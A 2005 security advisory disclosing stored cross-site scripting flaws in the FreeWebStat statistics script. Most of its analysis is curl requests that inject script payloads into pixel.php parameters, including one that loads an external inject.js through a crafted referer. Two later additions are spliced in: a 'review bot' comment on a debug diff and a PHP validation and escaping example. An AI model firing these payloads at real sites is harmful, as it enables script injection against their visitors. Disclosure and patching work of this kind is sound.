FreeWebStat Multiple Cross Site Scripting

FreeWebStat Multiple Cross Site Scripting
Posted Dec 1, 2005
Authored by Francesco Ongaro | Site ush.it

FreeWebStat version 1.0 rev37 is vulnerable to multiple cross site scripting flaws.

tags | advisory, xss
SHA-256 | 0020303ba5ebcc0da8d674752ec0c2c826555fce3288cdd245981ad3915983ad

FreeWebStat Multiple XSS Vulnerabilities

Name Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected FreeWebStat (verified on 1.0 rev37)
Severity Medium Risk
Vendor www.freewebstat.com
Advisory http://www_ush_it/2005/11/25/free-web-stat/
Author Francesco "aScii" Ongaro (ascii at katamail . com)
Date 20051125

I. BACKGROUND

FreeWebStat is a PHP statistics program; more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the latest version at the time of writing)
is vulnerable to multiple XSS. The impact is somewhat bigger than
a reflected XSS, since the data is stored to a file and the result
of a single query persists for some time on the backend. A
well-timed loop of requests will make the XSS permanent.

We issued an advisory for another application by the same
author, "Php Web Statistik Multiple Vulnerabilities", and the
author replied that a "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and found the same type of vulnerabilities.

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

This vulnerability can be exploited with a single GET request.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using anti-escape
methods (e.g. single quotes are stripped, but there are plenty
of working workarounds for this).

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)</script>&jsref=<script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www_ush_it"

$site, $jsref, $jsres and $jscolor are vulnerable.

Loading a URL in $jsref will give you a full link (if the logdb.html
page has any PageRank you can drain some of it).

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order of the alerts with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=<script>alert(123)&jsref=1024x768&jsres=1337&jscolor=red" \
  -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" \
  -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" \
  -e "http://www.suma.it/" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)&jsref=</script><script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www_ush_it"

2) stat.php search key XSS

2.1) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )
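Review bot: the debug line `+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";` writes the raw referer field into the page without htmlspecialchars(), so the instrumentation is itself an unescaped output of attacker-controlled data, the same defect the advisory reports for the real stat.php output; wrap the value in htmlspecialchars() if the echo is kept. Replacing the in_array() IP-archive check with `+ if (TRUE)` also switches off the per-IP de-duplication so every request is recorded, which is fine for a test bench but must never ship. The second line of the `# save the referer ...` comment has no leading `#`, so as shown it would not parse in PHP.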

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

This will display as many "DEBUG sukasuka" lines under the header and
above the "summary" as there are new queries.

# save the referer except the own domain name.
# if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=ssss&domain="

search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed in two places, the referer table and the
keyword table.

2.2) Exploiting the search key XSS

stat.php gives us some tricks, and we are evil. The string will be
lowercased and any + or - character will become a (real, not a %20) space.

$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower

$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=ppoopp<script language="javascript"-src="http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable.
Older versions have not been verified.

V. WORKAROUND

Input validation will fix the vulnerability.
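As an added example (not code from the advisory or from FreeWebStat) covering both the stat.php normalisation shown in 2.2 and this workaround: allow-list validation of the pixel.php parameters the advisory names, plus HTML escaping of the stored value when it is rendered. validate_pixel_params(), keyword_cell() and the reading of jscolor as a colour depth are assumptions.

```php
<?php
// Added example, not FreeWebStat's own code. Allow-list validation for the
// pixel.php parameters named in the advisory, and HTML escaping of stored
// values on output. The keyword normalisation copies the str_replace and
// strtolower lines quoted from stat.php. Function names and the meaning of
// jscolor (assumed: colour depth) are assumptions.

function validate_pixel_params(array $get): array
{
    $out = [];
    // host name only: letters, digits, dots and dashes
    $domain = $get['domain'] ?? '';
    $out['domain'] = preg_match('/^[a-z0-9.-]{1,253}$/i', $domain) ? strtolower($domain) : '';
    // site tag: a short alphanumeric label
    $site = $get['site'] ?? '';
    $out['site'] = preg_match('/^[a-z0-9_-]{1,32}$/i', $site) ? $site : '';
    // screen resolution such as 1024x768
    $res = $get['jsres'] ?? '';
    $out['jsres'] = preg_match('/^\d{2,5}x\d{2,5}$/', $res) ? $res : '';
    // colour depth: a small integer (assumption about this parameter)
    $color = $get['jscolor'] ?? '';
    $out['jscolor'] = ctype_digit($color) && strlen($color) <= 2 ? (int) $color : 0;
    // referer: must parse as an http(s) URL with a host; it is still escaped on output
    $ref = $get['jsref'] ?? '';
    $p = parse_url($ref);
    $ok = $p !== false && isset($p['scheme'], $p['host'])
        && in_array(strtolower($p['scheme']), ['http', 'https'], true);
    $out['jsref'] = $ok ? $ref : '';
    return $out;
}

// stat.php keyword normalisation as quoted in the advisory, followed by the
// escaping the original lacks: '<', '>' and quotes become entities, so a
// referer query like q=<script ...> is displayed as text, not executed.
function keyword_cell(string $terms): string
{
    $terms = str_replace('\"', '', $terms);        // delete \"
    $terms = strtolower($terms);                   // string to lower
    $terms = str_replace(['+', '-'], ' ', $terms); // + and - become spaces
    return '<td>' . htmlspecialchars($terms, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed request, modelled on the advisory's test curls.
$get = ['domain' => 'ush.it', 'site' => '<script>alert(2)</script>',
        'jsref' => 'http://www.google.it/search?q=lello+splendor++&hl=it',
        'jsres' => '1337', 'jscolor' => 'red'];
print_r(validate_pixel_params($get));
parse_str((string) parse_url($get['jsref'], PHP_URL_QUERY), $q);
echo keyword_cell($q['q'] ?? ''), "\n";
```

With the constructed request, site, jsres and jscolor are rejected as malformed while domain and jsref pass, and the keyword cell is emitted with any markup entity-encoded.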

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.